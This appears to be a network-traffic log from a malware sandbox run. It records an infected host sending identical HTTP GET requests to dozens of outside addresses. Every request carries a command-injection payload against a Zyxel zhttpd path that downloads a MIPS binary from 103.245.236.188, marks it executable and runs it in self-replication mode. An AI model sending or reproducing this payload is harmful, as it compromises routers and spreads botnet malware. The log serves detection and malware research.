                                                Jan 12, 2024 18:16:31.655591965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6647192.168.2.2346976158.126.84.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655622005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6648192.168.2.234103025.117.21.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655658960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6649192.168.2.2359682203.218.62.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655695915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6650192.168.2.2352208176.87.110.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655738115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6651192.168.2.235418220.164.18.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655772924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6652192.168.2.2355580112.133.41.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655839920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6653192.168.2.234922297.245.236.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655854940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6654192.168.2.235505073.209.219.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655905962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6655192.168.2.2337500171.198.191.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655927896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6656192.168.2.2342974129.43.221.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655966043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6657192.168.2.234369095.98.151.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655997038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6658192.168.2.2357532184.62.139.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.656033039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6659192.168.2.2347644206.71.205.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.656089067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6660192.168.2.2334936131.100.231.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668227911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6661192.168.2.2334876187.15.199.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668271065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6662192.168.2.2335848183.207.96.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668345928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6663192.168.2.2346200168.212.47.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668387890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6664192.168.2.2334404185.161.210.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668469906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6665192.168.2.233612832.111.142.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668509960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6666192.168.2.235604413.50.33.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668555975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6667192.168.2.235519814.220.55.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668616056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6668192.168.2.2344150124.22.55.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668658018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6669192.168.2.2353384171.68.13.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668761969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6670192.168.2.2346656163.86.207.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668822050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6671192.168.2.235116434.69.155.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668879032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6672192.168.2.2340330104.84.41.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668948889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6673192.168.2.234689293.28.48.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.668998957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6674192.168.2.235920259.154.8.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669049025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6675192.168.2.234360827.208.226.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669120073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6676192.168.2.2339208139.103.89.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669178963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6677192.168.2.2356170183.153.105.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669250011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6678192.168.2.234123651.253.180.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669290066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6679192.168.2.2358174210.117.163.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669334888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6680192.168.2.2345952182.197.59.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669389963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6681192.168.2.2337880141.180.195.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669456959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6682192.168.2.2354172112.79.254.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669493914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6683192.168.2.2360548221.128.190.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669557095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6684192.168.2.234510225.122.232.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669658899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6685192.168.2.2348282195.145.165.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669717073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6686192.168.2.2344902129.91.98.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669766903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6687192.168.2.23349204.234.137.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669828892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6688192.168.2.2336882116.225.34.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669910908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6689192.168.2.2350576210.209.40.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.669950962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6690192.168.2.2351264222.242.122.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670001984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6691192.168.2.235400274.235.160.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670036077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6692192.168.2.2352032182.42.38.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670072079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6693192.168.2.23423762.221.162.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670106888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6694192.168.2.2357500142.190.21.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670195103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6695192.168.2.2344294109.220.37.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670231104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6696192.168.2.2336328123.176.205.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670279980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6697192.168.2.2336758171.249.243.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670329094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6698192.168.2.2347514148.175.31.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670383930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6699192.168.2.2355552199.101.154.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670440912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6700192.168.2.234249670.65.74.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670480013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6701192.168.2.235500296.230.8.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670531034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6702192.168.2.2353204160.169.236.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670603991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6703192.168.2.2345452161.167.22.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670628071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6704192.168.2.233312465.51.216.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670681000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6705192.168.2.2346170114.145.101.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670727015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6706192.168.2.234705231.7.143.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670778990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6707192.168.2.2343470165.16.61.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670849085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6708192.168.2.235970673.63.202.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.670897007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6709192.168.2.235759435.239.206.83443
                                                TimestampBytes transferredDirectionData
